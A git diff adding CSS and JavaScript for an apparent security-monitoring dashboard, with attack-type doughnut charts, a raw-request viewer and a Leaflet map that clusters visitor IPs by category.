+.tabs-container { /* Tab strip: scrolls horizontally on overflow, vertical overflow hidden */ + border-bottom: 1px solid #30363d; + margin-bottom: 30px; + display: flex; + gap: 2px; + background: #161b22; + border-radius: 6px 6px 0 0; + overflow-x: auto; + overflow-y: hidden; +} +.tab-button { /* Transparent 3px bottom border; position: relative with bottom: -1px shifts the button down 1px */ + padding: 12px 20px; + background: transparent; + border: none; + color: #8b949e; + font-size: 14px; + font-weight: 500; + cursor: pointer; + white-space: nowrap; + transition: all 0.2s; + border-bottom: 3px solid transparent; + position: relative; + bottom: -1px; +} 
+.tab-button:hover { + color: #c9d1d9; + background: #1c2128; +} +.tab-button.active { + color: #58a6ff; + border-bottom-color: #58a6ff; +} +.tab-button.disabled { + color: #484f58; + cursor: not-allowed; + opacity: 0.6; +} +.tab-button.disabled:hover { + color: #484f58; + background: transparent; +} +.tab-content { + display: none; +} +.tab-content.active { + display: block; +} +.ip-stats-table { + width: 100%; + border-collapse: collapse; +} +.ip-stats-table th, .ip-stats-table td { + padding: 12px; + text-align: left; + border-bottom: 1px solid #30363d; +} +.ip-stats-table th { + background: #0d1117; + color: #58a6ff; + font-weight: 600; +} +.ip-stats-table tr:hover { + background: #1c2128; +} +.ip-detail-modal { + display: none; + position: fixed; + top: 0; + left: 0; + width: 100%; + height: 100%; + background: rgba(0, 0, 0, 0.7); + z-index: 1000; + align-items: center; + justify-content: center; +} +.ip-detail-modal.show { + display: flex; +} +.ip-detail-content { + background: #161b22; + border: 1px solid #30363d; + border-radius: 8px; + padding: 30px; + max-width: 900px; + max-height: 90vh; + overflow-y: auto; + position: relative; +} +.ip-detail-close { + position: absolute; + top: 15px; + right: 15px; + background: none; + border: none; + color: #8b949e; + font-size: 24px; + cursor: pointer; + padding: 0; + width: 30px; + height: 30px; + display: flex; + align-items: center; + justify-content: center; +} +.ip-detail-close:hover { + color: #c9d1d9; +} +#attacker-map { + background: #0d1117 !important; +} +.leaflet-container { + background: #0d1117 !important; +} +.leaflet-tile { + filter: none; +} +.leaflet-popup-content-wrapper { + background-color: #0d1117; + color: #c9d1d9; + border: 1px solid #30363d; + border-radius: 6px; + padding: 0; +} +.leaflet-popup-content { + margin: 0; + min-width: 280px; +} +.leaflet-popup-content-wrapper a { + color: #58a6ff; +} +.leaflet-popup-tip { + background: #0d1117; + border: 1px solid #30363d; +} +.ip-detail-popup 
.leaflet-popup-content-wrapper { + max-width: 340px !important; +} +/* Remove the default leaflet icon background */ +.ip-custom-marker { + background: none !important; + border: none !important; +} +.ip-marker { + border: 2px solid #fff; + border-radius: 50%; + display: flex; + align-items: center; + justify-content: center; + font-size: 10px; + font-weight: bold; + color: white; + cursor: pointer; + transition: transform 0.2s, box-shadow 0.2s; +} +.ip-marker:hover { + transform: scale(1.15); +} +.marker-attacker { + background: #f85149; + box-shadow: 0 0 8px rgba(248, 81, 73, 0.8), inset 0 0 4px rgba(248, 81, 73, 0.5); +} +.marker-attacker:hover { + box-shadow: 0 0 15px rgba(248, 81, 73, 1), inset 0 0 6px rgba(248, 81, 73, 0.7); +} +.marker-bad_crawler { + background: #f0883e; + box-shadow: 0 0 8px rgba(240, 136, 62, 0.8), inset 0 0 4px rgba(240, 136, 62, 0.5); +} +.marker-bad_crawler:hover { + box-shadow: 0 0 15px rgba(240, 136, 62, 1), inset 0 0 6px rgba(240, 136, 62, 0.7); +} +.marker-good_crawler { + background: #3fb950; + box-shadow: 0 0 8px rgba(63, 185, 80, 0.8), inset 0 0 4px rgba(63, 185, 80, 0.5); +} +.marker-good_crawler:hover { + box-shadow: 0 0 15px rgba(63, 185, 80, 1), inset 0 0 6px rgba(63, 185, 80, 0.7); +} +.marker-regular_user { + background: #58a6ff; + box-shadow: 0 0 8px rgba(88, 166, 255, 0.8), inset 0 0 4px rgba(88, 166, 255, 0.5); +} +.marker-regular_user:hover { + box-shadow: 0 0 15px rgba(88, 166, 255, 1), inset 0 0 6px rgba(88, 166, 255, 0.7); +} +.marker-unknown { + background: #8b949e; + box-shadow: 0 0 8px rgba(139, 148, 158, 0.8), inset 0 0 4px rgba(139, 148, 158, 0.5); +} +.marker-unknown:hover { + box-shadow: 0 0 15px rgba(139, 148, 158, 1), inset 0 0 6px rgba(139, 148, 158, 0.7); +} +/* Custom pie-chart cluster icons */ +.ip-cluster-icon { + background: none !important; + border: none !important; +} +.leaflet-bottom.leaflet-right { + display: none !important; +} +.charts-container { + display: grid; + grid-template-columns: 1fr 
1fr; + gap: 20px; + margin-top: 20px; +} +.chart-section { + display: flex; + flex-direction: column; +} +.chart-wrapper { + display: flex; + flex-direction: column; +} +#attack-types-chart { + max-height: 350px; +} +#attack-patterns-chart { + max-height: 350px; +} +@media (max-width: 1200px) { + .charts-container { + grid-template-columns: 1fr; + } +} + +/* Raw Request Modal */ +.raw-request-modal { + position: fixed; + z-index: 1000; + left: 0; + top: 0; + width: 100%; + height: 100%; + background-color: rgba(0, 0, 0, 0.7); + overflow: auto; +} +.raw-request-modal-content { + background-color: #161b22; + margin: 5% auto; + padding: 0; + border: 1px solid #30363d; + border-radius: 6px; + width: 80%; + max-width: 900px; + box-shadow: 0 8px 32px rgba(0, 0, 0, 0.5); +} +.raw-request-modal-header { + padding: 16px 20px; + background-color: #21262d; + border-bottom: 1px solid #30363d; + border-radius: 6px 6px 0 0; + display: flex; + justify-content: space-between; + align-items: center; +} +.raw-request-modal-header h3 { + margin: 0; + color: #58a6ff; + font-size: 16px; +} +.raw-request-modal-close { + color: #8b949e; + font-size: 28px; + font-weight: bold; + cursor: pointer; + line-height: 20px; + transition: color 0.2s; +} +.raw-request-modal-close:hover { + color: #c9d1d9; +} +.raw-request-modal-body { + padding: 20px; +} +.raw-request-content { + background-color: #0d1117; + border: 1px solid #30363d; + border-radius: 6px; + padding: 16px; + font-family: 'Courier New', Courier, monospace; + font-size: 12px; + color: #c9d1d9; + white-space: pre-wrap; + word-wrap: break-word; + max-height: 400px; + overflow-y: auto; +} +.raw-request-modal-footer { + padding: 16px 20px; + background-color: #21262d; + border-top: 1px solid #30363d; + border-radius: 0 0 6px 6px; + text-align: right; +} +.raw-request-download-btn { + padding: 8px 16px; + background: #238636; + color: #ffffff; + border: none; + border-radius: 6px; + font-weight: 500; + font-size: 13px; + cursor: pointer; 
+ transition: background 0.2s; +} +.raw-request-download-btn:hover { + background: #2ea043; +} + +/* Attack Types Cell Styling */ +.attack-types-cell { + max-width: 280px; + position: relative; + display: inline-block; + width: 100%; + overflow: visible; +} +.attack-types-truncated { + display: block; + width: 100%; + max-width: 280px; + overflow: hidden; + text-overflow: ellipsis; + white-space: nowrap; + color: #fb8500; + font-weight: 500; + transition: all 0.2s; + position: relative; +} +.attack-types-tooltip { + position: absolute; + bottom: 100%; + left: 0; + background: #0d1117; + border: 1px solid #30363d; + border-radius: 6px; + padding: 12px; + margin-bottom: 8px; + max-width: 400px; + word-wrap: break-word; + white-space: normal; + z-index: 1000; + color: #c9d1d9; + font-size: 12px; + font-weight: normal; + display: none; + box-shadow: 0 8px 24px rgba(0, 0, 0, 0.5); + pointer-events: auto; +} +.attack-types-cell:hover .attack-types-tooltip { + display: block; +} +.attack-types-tooltip::after { + content: ''; + position: absolute; + top: 100%; + left: 12px; + border: 6px solid transparent; + border-top-color: #30363d; +} +.attack-types-tooltip::before { + content: ''; + position: absolute; + top: 100%; + left: 13px; + border: 5px solid transparent; + border-top-color: #0d1117; + z-index: 1; +} + +/* Path Cell Styling for Attack Table */ +.path-cell-container { + position: relative; + display: inline-block; + max-width: 100%; +} +.path-truncated { + display: block; + max-width: 250px; + overflow: hidden; + text-overflow: ellipsis; + white-space: nowrap; + cursor: pointer; + color: #f85149 !important; + font-weight: 500; + text-decoration: underline; + text-decoration-style: dotted; + text-underline-offset: 3px; + transition: all 0.2s; +} +.path-truncated:hover { + color: #ff7369 !important; + text-decoration-style: solid; +} +.path-cell-container:hover .path-tooltip { + display: block; +} +.path-tooltip { + position: absolute; + bottom: 100%; + left: 0; + 
background: #0d1117; + border: 1px solid #30363d; + border-radius: 6px; + padding: 8px 12px; + margin-bottom: 8px; + max-width: 500px; + word-wrap: break-word; + white-space: normal; + z-index: 1000; + color: #c9d1d9; + font-size: 12px; + font-weight: normal; + display: none; + box-shadow: 0 8px 24px rgba(0, 0, 0, 0.5); + font-family: 'Courier New', monospace; +} +.path-tooltip::after { + content: ''; + position: absolute; + top: 100%; + left: 12px; + border: 6px solid transparent; + border-top-color: #30363d; +} +.path-tooltip::before { + content: ''; + position: absolute; + top: 100%; + left: 13px; + border: 5px solid transparent; + border-top-color: #0d1117; + z-index: 1; +} + +/* Mobile Optimization - Tablets (768px and down) */ +@media (max-width: 768px) { + body { + padding: 12px; + } + .container { + max-width: 100%; + } + h1 { + font-size: 24px; + margin-bottom: 20px; + } + .github-logo { + position: relative; + top: auto; + left: auto; + margin-bottom: 15px; + } + .download-section { + position: relative; + top: auto; + right: auto; + margin-bottom: 20px; + } + .stats-grid { + grid-template-columns: repeat(2, 1fr); + gap: 12px; + margin-bottom: 20px; + } + .stat-value { + font-size: 28px; + } + .stat-card { + padding: 15px; + } + .table-container { + padding: 12px; + margin-bottom: 15px; + overflow-x: auto; + } + table { + font-size: 13px; + } + th, td { + padding: 10px 6px; + } + h2 { + font-size: 18px; + } + .tabs-container { + gap: 0; + overflow-x: auto; + -webkit-overflow-scrolling: touch; + } + .tab-button { + padding: 10px 16px; + font-size: 12px; + } + .ip-stats-dropdown { + flex-direction: column; + gap: 15px; + } + .stats-right { + flex: 0 0 auto; + width: 100%; + } + .radar-chart { + width: 160px; + height: 160px; + } + .timeline-container { + flex-direction: column; + gap: 15px; + min-height: auto; + } + .timeline-column { + flex: 1 !important; + max-height: 300px; + } + #attacker-map { + height: 350px !important; + } + .leaflet-popup-content { 
+ min-width: 200px !important; + } + .ip-marker { + font-size: 8px; + } + .ip-detail-content { + padding: 20px; + max-width: 95%; + max-height: 85vh; + } + .download-btn { + padding: 6px 12px; + font-size: 12px; + } +} + +/* Mobile Optimization - Small phones (480px and down) */ +@media (max-width: 480px) { + body { + padding: 8px; + } + h1 { + font-size: 20px; + margin-bottom: 15px; + } + .stats-grid { + grid-template-columns: 1fr; + gap: 10px; + margin-bottom: 15px; + } + .stat-value { + font-size: 24px; + } + .stat-card { + padding: 12px; + } + .stat-label { + font-size: 12px; + } + .table-container { + padding: 10px; + margin-bottom: 12px; + border-radius: 4px; + } + table { + font-size: 12px; + } + th, td { + padding: 8px 4px; + } + th { + position: relative; + } + th.sortable::after { + right: 4px; + font-size: 10px; + } + h2 { + font-size: 16px; + margin-bottom: 12px; + } + .tabs-container { + gap: 0; + } + .tab-button { + padding: 10px 12px; + font-size: 11px; + flex: 1; + } + .ip-row { + display: block; + margin-bottom: 10px; + background: #1c2128; + padding: 10px; + border-radius: 4px; + } + .ip-row td { + display: block; + padding: 4px 0; + border: none; + } + .ip-row td::before { + content: attr(data-label); + font-weight: bold; + color: #8b949e; + margin-right: 8px; + } + .ip-clickable { + display: inline-block; + } + .ip-stats-dropdown { + flex-direction: column; + gap: 12px; + font-size: 12px; + } + .stats-left { + flex: 1; + } + .stats-right { + flex: 0 0 auto; + width: 100%; + } + .radar-chart { + width: 140px; + height: 140px; + } + .radar-legend { + margin-top: 8px; + font-size: 10px; + } + .stat-row { + padding: 4px 0; + } + .stat-label-sm { + font-size: 12px; + } + .stat-value-sm { + font-size: 13px; + } + .category-badge { + padding: 3px 6px; + font-size: 10px; + } + .timeline-container { + flex-direction: column; + gap: 12px; + min-height: auto; + } + .timeline-column { + flex: 1 !important; + max-height: 250px; + font-size: 11px; + } + 
.timeline-header { + font-size: 12px; + margin-bottom: 8px; + } + .timeline-item { + padding-bottom: 10px; + font-size: 11px; + } + .timeline-marker { + left: -19px; + width: 12px; + height: 12px; + } + .reputation-badge { + display: block; + margin-bottom: 6px; + margin-right: 0; + font-size: 10px; + } + #attacker-map { + height: 300px !important; + } + .leaflet-popup-content { + min-width: 150px !important; + } + .ip-marker { + font-size: 7px; + } + .ip-detail-modal { + justify-content: flex-end; + align-items: flex-end; + } + .ip-detail-content { + padding: 15px; + max-width: 100%; + max-height: 90vh; + border-radius: 8px 8px 0 0; + width: 100%; + } + .download-btn { + padding: 6px 10px; + font-size: 11px; + } + .github-logo { + font-size: 12px; + } + .github-logo svg { + width: 24px; + height: 24px; + } +} + +/* Landscape mode optimization */ +@media (max-height: 600px) and (orientation: landscape) { + body { + padding: 8px; + } + h1 { + margin-bottom: 10px; + font-size: 18px; + } + .stats-grid { + margin-bottom: 10px; + gap: 8px; + } + .stat-value { + font-size: 20px; + } + .stat-card { + padding: 8px; + } + #attacker-map { + height: 250px !important; + } + .ip-stats-dropdown { + gap: 10px; + } + .radar-chart { + width: 120px; + height: 120px; + } +} + +/* Touch-friendly optimizations */ +@media (hover: none) and (pointer: coarse) { + .ip-clickable { + -webkit-user-select: none; + user-select: none; + -webkit-tap-highlight-color: rgba(88, 166, 255, 0.2); + } + .tab-button { + -webkit-user-select: none; + user-select: none; + -webkit-tap-highlight-color: rgba(88, 166, 255, 0.2); + padding: 14px 18px; + } + .download-btn { + -webkit-user-select: none; + user-select: none; + -webkit-tap-highlight-color: rgba(36, 134, 54, 0.3); + } + input[type="checkbox"] { + width: 18px; + height: 18px; + cursor: pointer; + } +} + +/* Dynamically injected button styles (previously in JS) */ +.view-btn { + padding: 4px 10px; + background: #21262d; + color: #58a6ff; + border: 1px 
solid #30363d; + border-radius: 4px; + font-size: 11px; + cursor: pointer; + transition: all 0.2s; + white-space: nowrap; +} +.view-btn:hover { + background: #30363d; + border-color: #58a6ff; +} +.inspect-btn { + display: inline-flex; + align-items: center; + justify-content: center; + padding: 4px; + background: none; + border: none; + color: #8b949e; + cursor: pointer; + border-radius: 4px; + transition: color 0.2s, background 0.2s; +} +.inspect-btn svg { + width: 16px; + height: 16px; + fill: currentColor; +} +.inspect-btn:hover { + color: #58a6ff; + background: rgba(88, 166, 255, 0.1); +} +.pagination-btn { + padding: 6px 14px; + background: #21262d; + color: #c9d1d9; + border: 1px solid #30363d; + border-radius: 4px; + font-size: 12px; + cursor: pointer; + transition: all 0.2s; +} +.pagination-btn:hover:not(:disabled) { + background: #30363d; + border-color: #58a6ff; + color: #58a6ff; +} +.pagination-btn:disabled { + opacity: 0.4; + cursor: not-allowed; +} +.pagination-info { + color: #8b949e; + font-size: 12px; +} + +/* HTMX loading indicator */ +.htmx-indicator { + display: none; + color: #8b949e; + font-style: italic; + padding: 20px; + text-align: center; +} +.htmx-request .htmx-indicator { + display: block; +} +.htmx-request.htmx-indicator { + display: block; +} + +/* Alpine.js cloak */ +[x-cloak] { + display: none !important; +} + +/* ── Search Bar ────────────────────────────────────── */ +.search-bar-container { + max-width: 100%; + margin: 0 0 20px 0; +} +.search-bar { + position: relative; + display: flex; + align-items: center; +} +.search-icon { + position: absolute; + left: 14px; + width: 18px; + height: 18px; + color: #8b949e; + pointer-events: none; +} +.search-bar input[type="search"] { + width: 100%; + padding: 12px 40px 12px 42px; + background: #0d1117; + border: 1px solid #30363d; + border-radius: 6px; + color: #c9d1d9; + font-size: 14px; + outline: none; + transition: border-color 0.2s, box-shadow 0.2s; +} +.search-bar 
input[type="search"]::placeholder { + color: #6e7681; +} +.search-bar input[type="search"]:focus { + border-color: #58a6ff; + box-shadow: 0 0 0 3px rgba(88, 166, 255, 0.15); +} +.search-bar input[type="search"]::-webkit-search-cancel-button { + -webkit-appearance: none; + appearance: none; + width: 16px; + height: 16px; + background: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20' fill='%238b949e'%3E%3Cpath d='M6.28 5.22a.75.75 0 00-1.06 1.06L8.94 10l-3.72 3.72a.75.75 0 101.06 1.06L10 11.06l3.72 3.72a.75.75 0 101.06-1.06L11.06 10l3.72-3.72a.75.75 0 00-1.06-1.06L10 8.94 6.28 5.22z'/%3E%3C/svg%3E") center/contain no-repeat; + cursor: pointer; +} +.search-spinner { + position: absolute; + right: 14px; + width: 16px; + height: 16px; + padding: 0; + border: 2px solid #30363d; + border-top-color: #58a6ff; + border-radius: 50%; + animation: spin 0.6s linear infinite; +} +@keyframes spin { + to { transform: rotate(360deg); } +} + +/* ── Search Results ───────────────────────────────── */ +.search-results { + margin-top: 12px; + background: #161b22; + border: 1px solid #30363d; + border-radius: 6px; + padding: 16px; + animation: fadeIn 0.3s ease-in; +} +@keyframes fadeIn { + from { opacity: 0; transform: translateY(-4px); } + to { opacity: 1; transform: translateY(0); } +} +.search-results-header { + display: flex; + justify-content: space-between; + align-items: center; + margin-bottom: 14px; + padding-bottom: 10px; + border-bottom: 1px solid #30363d; +} +.search-results-summary { + color: #8b949e; + font-size: 13px; +} +.search-results-summary strong { + color: #58a6ff; +} +.search-close-btn { + background: none; + border: none; + color: #8b949e; + font-size: 22px; + cursor: pointer; + padding: 0 4px; + line-height: 1; + transition: color 0.2s; +} +.search-close-btn:hover { + color: #f85149; +} +.search-section { + margin-bottom: 16px; +} +.search-section:last-of-type { + margin-bottom: 0; +} +.search-section-title { + color: #58a6ff; 
+ font-size: 14px; + font-weight: 600; + margin: 0 0 8px 0; +} +.search-pagination { + display: flex; + justify-content: space-between; + align-items: center; + margin-top: 12px; + padding-top: 10px; + border-top: 1px solid #30363d; +} +.search-no-results { + text-align: center; + color: #4a515a; + padding: 24px 0; + font-size: 14px; +} + +/* ── Empty State (no data rows) ───────────────────── */ +.empty-state { + text-align: center; + color: #4a515a; + padding: 20px 12px; +} diff --git a/src/templates/static/js/charts.js b/src/templates/static/js/charts.js new file mode 100644 index 0000000..749019b --- /dev/null +++ b/src/templates/static/js/charts.js @@ -0,0 +1,181 @@ +// Chart.js Attack Types Chart +// Extracted from dashboard_template.py (lines ~3370-3550) + +let attackTypesChart = null; +let attackTypesChartLoaded = false; + +/** + * Load an attack types doughnut chart into a canvas element. + * @param {string} [canvasId='attack-types-chart'] - Canvas element ID + * @param {string} [ipFilter] - Optional IP address to scope results + * @param {string} [legendPosition='right'] - Legend position + */ +async function loadAttackTypesChart(canvasId, ipFilter, legendPosition) { + canvasId = canvasId || 'attack-types-chart'; + legendPosition = legendPosition || 'right'; + const DASHBOARD_PATH = window.__DASHBOARD_PATH__ || ''; + + try { + const canvas = document.getElementById(canvasId); + if (!canvas) return; + + let url = DASHBOARD_PATH + '/api/attack-types-stats?limit=10'; + if (ipFilter) url += '&ip_filter=' + encodeURIComponent(ipFilter); + + const response = await fetch(url, { + cache: 'no-store', + headers: { + 'Cache-Control': 'no-cache', + 'Pragma': 'no-cache' + } + }); + + if (!response.ok) throw new Error('Failed to fetch attack types'); + + const data = await response.json(); + const attackTypes = data.attack_types || []; + + if (attackTypes.length === 0) { + canvas.parentElement.innerHTML = '
No attack data
'; + return; + } + + const labels = attackTypes.map(item => item.type); + const counts = attackTypes.map(item => item.count); + const maxCount = Math.max(...counts); + + // Hash function to generate consistent color from string + function hashCode(str) { + let hash = 0; + for (let i = 0; i < str.length; i++) { + const char = str.charCodeAt(i); + hash = ((hash << 5) - hash) + char; + hash = hash & hash; // Convert to 32bit integer + } + return Math.abs(hash); + } + + // Dynamic color generator based on hash + function generateColorFromHash(label) { + const hash = hashCode(label); + const hue = (hash % 360); // 0-360 for hue + const saturation = 70 + (hash % 20); // 70-90 for vibrant colors + const lightness = 50 + (hash % 10); // 50-60 for brightness + + const bgColor = `hsl(${hue}, ${saturation}%, ${lightness}%)`; + const borderColor = `hsl(${hue}, ${saturation + 5}%, ${lightness - 10}%)`; // Darker border + const hoverColor = `hsl(${hue}, ${saturation - 10}%, ${lightness + 8}%)`; // Lighter hover + + return { bg: bgColor, border: borderColor, hover: hoverColor }; + } + + // Generate colors dynamically for each attack type + const backgroundColors = labels.map(label => generateColorFromHash(label).bg); + const borderColors = labels.map(label => generateColorFromHash(label).border); + const hoverColors = labels.map(label => generateColorFromHash(label).hover); + + // Create or update chart (track per canvas) + if (!loadAttackTypesChart._instances) loadAttackTypesChart._instances = {}; + if (loadAttackTypesChart._instances[canvasId]) { + loadAttackTypesChart._instances[canvasId].destroy(); + } + + const ctx = canvas.getContext('2d'); + const chartInstance = new Chart(ctx, { + type: 'doughnut', + data: { + labels: labels, + datasets: [{ + data: counts, + backgroundColor: backgroundColors, + borderColor: '#0d1117', + borderWidth: 3, + hoverBorderColor: '#58a6ff', + hoverBorderWidth: 4, + hoverOffset: 10 + }] + }, + options: { + responsive: true, + maintainAspectRatio: 
false, + plugins: { + legend: { + position: legendPosition, + labels: { + color: '#c9d1d9', + font: { + size: 12, + weight: '500', + family: "'Segoe UI', Tahoma, Geneva, Verdana" + }, + padding: 16, + usePointStyle: true, + pointStyle: 'circle', + generateLabels: (chart) => { + const data = chart.data; + return data.labels.map((label, i) => ({ + text: `${label} (${data.datasets[0].data[i]})`, + fillStyle: data.datasets[0].backgroundColor[i], + hidden: false, + index: i, + pointStyle: 'circle' + })); + } + } + }, + tooltip: { + enabled: true, + backgroundColor: 'rgba(22, 27, 34, 0.95)', + titleColor: '#58a6ff', + bodyColor: '#c9d1d9', + borderColor: '#58a6ff', + borderWidth: 2, + padding: 14, + titleFont: { + size: 14, + weight: 'bold', + family: "'Segoe UI', Tahoma, Geneva, Verdana" + }, + bodyFont: { + size: 13, + family: "'Segoe UI', Tahoma, Geneva, Verdana" + }, + caretSize: 8, + caretPadding: 12, + callbacks: { + label: function(context) { + const total = context.dataset.data.reduce((a, b) => a + b, 0); + const percentage = ((context.parsed / total) * 100).toFixed(1); + return `${context.label}: ${percentage}%`; + } + } + } + }, + animation: { + enabled: false + }, + onHover: (event, activeElements) => { + canvas.style.cursor = activeElements.length > 0 ? 
'pointer' : 'default'; + } + }, + plugins: [{ + id: 'customCanvasBackgroundColor', + beforeDraw: (chart) => { + if (chart.ctx) { + chart.ctx.save(); + chart.ctx.globalCompositeOperation = 'destination-over'; + chart.ctx.fillStyle = 'rgba(0,0,0,0)'; + chart.ctx.fillRect(0, 0, chart.width, chart.height); + chart.ctx.restore(); + } + } + }] + }); + + loadAttackTypesChart._instances[canvasId] = chartInstance; + attackTypesChart = chartInstance; + attackTypesChartLoaded = true; + } catch (err) { + console.error('Error loading attack types chart:', err); + } +} diff --git a/src/templates/static/js/dashboard.js b/src/templates/static/js/dashboard.js new file mode 100644 index 0000000..e6e848b --- /dev/null +++ b/src/templates/static/js/dashboard.js @@ -0,0 +1,164 @@ +// Alpine.js Dashboard Application +document.addEventListener('alpine:init', () => { + Alpine.data('dashboardApp', () => ({ + // State + tab: 'overview', + dashboardPath: window.__DASHBOARD_PATH__ || '', + + // Banlist dropdown + banlistOpen: false, + + // Raw request modal + rawModal: { show: false, content: '', logId: null }, + + // Map state + mapInitialized: false, + + // Chart state + chartLoaded: false, + + // IP Insight state + insightIp: null, + + init() { + // Handle hash-based tab routing + const hash = window.location.hash.slice(1); + if (hash === 'ip-stats' || hash === 'attacks') { + this.switchToAttacks(); + } + // ip-insight tab is only accessible via lens buttons, not direct hash navigation + + window.addEventListener('hashchange', () => { + const h = window.location.hash.slice(1); + if (h === 'ip-stats' || h === 'attacks') { + this.switchToAttacks(); + } else if (h !== 'ip-insight') { + // Don't switch away from ip-insight via hash if already there + if (this.tab !== 'ip-insight') { + this.switchToOverview(); + } + } + }); + }, + + switchToAttacks() { + this.tab = 'attacks'; + window.location.hash = '#ip-stats'; + + // Delay chart initialization to ensure the container is visible + 
this.$nextTick(() => { + setTimeout(() => { + if (!this.chartLoaded && typeof loadAttackTypesChart === 'function') { + loadAttackTypesChart(); + this.chartLoaded = true; + } + }, 200); + }); + }, + + switchToOverview() { + this.tab = 'overview'; + window.location.hash = '#overview'; + }, + + switchToIpInsight() { + // Only allow switching if an IP is selected + if (!this.insightIp) return; + this.tab = 'ip-insight'; + window.location.hash = '#ip-insight'; + }, + + openIpInsight(ip) { + // Set the IP and load the insight content + this.insightIp = ip; + this.tab = 'ip-insight'; + window.location.hash = '#ip-insight'; + + // Load IP insight content via HTMX + this.$nextTick(() => { + const container = document.getElementById('ip-insight-htmx-container'); + if (container && typeof htmx !== 'undefined') { + htmx.ajax('GET', `${this.dashboardPath}/htmx/ip-insight/${encodeURIComponent(ip)}`, { + target: '#ip-insight-htmx-container', + swap: 'innerHTML' + }); + } + }); + }, + + async viewRawRequest(logId) { + try { + const resp = await fetch( + `${this.dashboardPath}/api/raw-request/${logId}`, + { cache: 'no-store' } + ); + if (resp.status === 404) { + alert('Raw request not available'); + return; + } + const data = await resp.json(); + this.rawModal.content = data.raw_request || 'No content available'; + this.rawModal.logId = logId; + this.rawModal.show = true; + } catch (err) { + alert('Failed to load raw request'); + } + }, + + closeRawModal() { + this.rawModal.show = false; + this.rawModal.content = ''; + this.rawModal.logId = null; + }, + + downloadRawRequest() { + if (!this.rawModal.content) return; + const blob = new Blob([this.rawModal.content], { type: 'text/plain' }); + const url = URL.createObjectURL(blob); + const a = document.createElement('a'); + a.href = url; + a.download = `raw-request-${this.rawModal.logId || Date.now()}.txt`; + document.body.appendChild(a); + a.click(); + document.body.removeChild(a); + URL.revokeObjectURL(url); + }, + + 
toggleIpDetail(event) { + const row = event.target.closest('tr'); + if (!row) return; + const detailRow = row.nextElementSibling; + if (detailRow && detailRow.classList.contains('ip-stats-row')) { + detailRow.style.display = + detailRow.style.display === 'table-row' ? 'none' : 'table-row'; + } + }, + })); +}); + +// Global function for opening IP Insight (used by map popups) +window.openIpInsight = function(ip) { + // Find the Alpine component and call openIpInsight + const container = document.querySelector('[x-data="dashboardApp()"]'); + if (container) { + // Try Alpine 3.x API first, then fall back to older API + const data = Alpine.$data ? Alpine.$data(container) : (container._x_dataStack && container._x_dataStack[0]); + if (data && typeof data.openIpInsight === 'function') { + data.openIpInsight(ip); + } + } +}; + +// Utility function for formatting timestamps (used by map popups) +function formatTimestamp(isoTimestamp) { + if (!isoTimestamp) return 'N/A'; + try { + const date = new Date(isoTimestamp); + return date.toLocaleString('en-US', { + year: 'numeric', month: '2-digit', day: '2-digit', + hour: '2-digit', minute: '2-digit', second: '2-digit', hour12: false + }); + } catch { + return isoTimestamp; + } +} diff --git a/src/templates/static/js/map.js b/src/templates/static/js/map.js new file mode 100644 index 0000000..1350bb9 --- /dev/null +++ b/src/templates/static/js/map.js @@ -0,0 +1,569 @@ +// IP Map Visualization +// Extracted from dashboard_template.py (lines ~2978-3348) + +let attackerMap = null; +let allIps = []; +let mapMarkers = []; // all marker objects, each tagged with .options.category +let clusterGroup = null; // single shared MarkerClusterGroup +let hiddenCategories = new Set(); + +const categoryColors = { + attacker: '#f85149', + bad_crawler: '#f0883e', + good_crawler: '#3fb950', + regular_user: '#58a6ff', + unknown: '#8b949e' +}; + +// Build a conic-gradient pie icon showing the category mix inside a cluster +function 
createClusterIcon(cluster) { + const children = cluster.getAllChildMarkers(); + const counts = {}; + children.forEach(m => { + const cat = m.options.category || 'unknown'; + counts[cat] = (counts[cat] || 0) + 1; + }); + + const total = children.length; + const sorted = Object.entries(counts).sort((a, b) => b[1] - a[1]); + let gradientStops = []; + let cumulative = 0; + sorted.forEach(([cat, count]) => { + const start = (cumulative / total) * 360; + cumulative += count; + const end = (cumulative / total) * 360; + const color = categoryColors[cat] || '#8b949e'; + gradientStops.push(`${color} ${start.toFixed(1)}deg ${end.toFixed(1)}deg`); + }); + + const size = Math.max(20, Math.min(44, 20 + Math.log2(total) * 4)); + const centerSize = size - 8; + const centerOffset = 4; + const ringWidth = 4; + const radius = (size / 2) - (ringWidth / 2); + const cx = size / 2; + const cy = size / 2; + const gapDeg = 8; + + // Build SVG arc segments with gaps - glow layer first, then sharp layer + let glowSegments = ''; + let segments = ''; + let currentAngle = -90; + sorted.forEach(([cat, count], idx) => { + const sliceDeg = (count / total) * 360; + if (sliceDeg < gapDeg) return; + const startAngle = currentAngle + (gapDeg / 2); + const endAngle = currentAngle + sliceDeg - (gapDeg / 2); + const startRad = (startAngle * Math.PI) / 180; + const endRad = (endAngle * Math.PI) / 180; + const x1 = cx + radius * Math.cos(startRad); + const y1 = cy + radius * Math.sin(startRad); + const x2 = cx + radius * Math.cos(endRad); + const y2 = cy + radius * Math.sin(endRad); + const largeArc = (endAngle - startAngle) > 180 ? 1 : 0; + const color = categoryColors[cat] || '#8b949e'; + // Glow layer - subtle + glowSegments += ``; + // Sharp layer + segments += ``; + currentAngle += sliceDeg; + }); + + return L.divIcon({ + html: `
` + + `` + + `` + + `${glowSegments}${segments}` + + `
${total}
` + + `
`, + className: 'ip-cluster-icon', + iconSize: L.point(size, size) + }); +} + +// City coordinates database (major cities worldwide) +const cityCoordinates = { + // United States + 'New York': [40.7128, -74.0060], 'Los Angeles': [34.0522, -118.2437], + 'San Francisco': [37.7749, -122.4194], 'Chicago': [41.8781, -87.6298], + 'Seattle': [47.6062, -122.3321], 'Miami': [25.7617, -80.1918], + 'Boston': [42.3601, -71.0589], 'Atlanta': [33.7490, -84.3880], + 'Dallas': [32.7767, -96.7970], 'Houston': [29.7604, -95.3698], + 'Denver': [39.7392, -104.9903], 'Phoenix': [33.4484, -112.0740], + // Europe + 'London': [51.5074, -0.1278], 'Paris': [48.8566, 2.3522], + 'Berlin': [52.5200, 13.4050], 'Amsterdam': [52.3676, 4.9041], + 'Moscow': [55.7558, 37.6173], 'Rome': [41.9028, 12.4964], + 'Madrid': [40.4168, -3.7038], 'Barcelona': [41.3874, 2.1686], + 'Milan': [45.4642, 9.1900], 'Vienna': [48.2082, 16.3738], + 'Stockholm': [59.3293, 18.0686], 'Oslo': [59.9139, 10.7522], + 'Copenhagen': [55.6761, 12.5683], 'Warsaw': [52.2297, 21.0122], + 'Prague': [50.0755, 14.4378], 'Budapest': [47.4979, 19.0402], + 'Athens': [37.9838, 23.7275], 